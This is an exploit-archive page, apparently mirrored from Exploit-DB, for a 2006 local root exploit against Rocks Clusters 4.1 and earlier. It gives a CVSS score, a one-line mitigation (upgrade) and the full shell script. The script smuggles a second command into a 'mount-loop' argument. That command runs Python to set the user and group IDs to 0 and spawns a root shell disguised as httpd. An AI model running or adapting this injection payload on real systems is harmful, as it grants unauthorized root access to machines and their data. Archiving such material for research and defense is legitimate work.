header-logo
Suggest Exploit
vendor:
Rocks Clusters
by:
xavier@tigerteam.se
9,3
CVSS
HIGH
Local Root Exploit
N/A
CWE
Product Name: Rocks Clusters
Affected Version From: Rocks Clusters <=4.1
Affected Version To: Rocks Clusters <=4.1
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2006

Rocks release <=4.1 local root exploit

Rocks Clusters <=4.1 mount-loop local root exploit by xavier@tigerteam.se. The exploit uses the mount-loop command to execute a python script that sets the UID and GID to 0, allowing the attacker to gain root privileges.

Mitigation:

Upgrade to a version of Rocks Clusters that is not vulnerable to this exploit.
Source

Exploit-DB raw data:

#!/bin/sh
##############################################################################
##  rocksmountdirty.sh: Rocks release <=4.1 local root exploit
##  make sure 'mount-loop' is in your path for this to work.
##
##  coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################
echo "Rocks Clusters <=4.1 mount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
echo "getting root.. goodluck"
mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'"

# milw0rm.com [2006-07-15]

Navigation

Suggest Exploit

Services By CQR